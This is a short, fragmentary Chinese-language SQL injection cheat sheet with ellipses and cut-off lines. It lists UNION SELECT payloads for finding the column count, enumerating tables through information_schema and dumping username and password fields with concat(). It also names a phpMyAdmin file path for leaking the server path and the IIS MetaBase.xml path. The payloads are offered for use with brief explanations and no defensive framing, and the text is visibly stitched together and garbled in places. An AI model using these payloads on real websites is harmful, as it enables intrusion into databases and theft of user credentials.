13
- 解释:排序功能,根据查询结果中的第几个字段数做排序,试探当前sql查询返回的字段数
- union select 1,2,3,4,****11,12,13 from admin...)Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
- and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10...=表名(十六进制)limit 0,1
- 解释:猜字段
- and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1...- 解释:暴密码
- Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
- 解释:高级用法(一个可用字段显示两个数据内容.../themes/darkblue_orange/layout.inc.php phpmyadmin
- 解释:爆路径
- c:\windows\system32\inetsrv\MetaBase.xml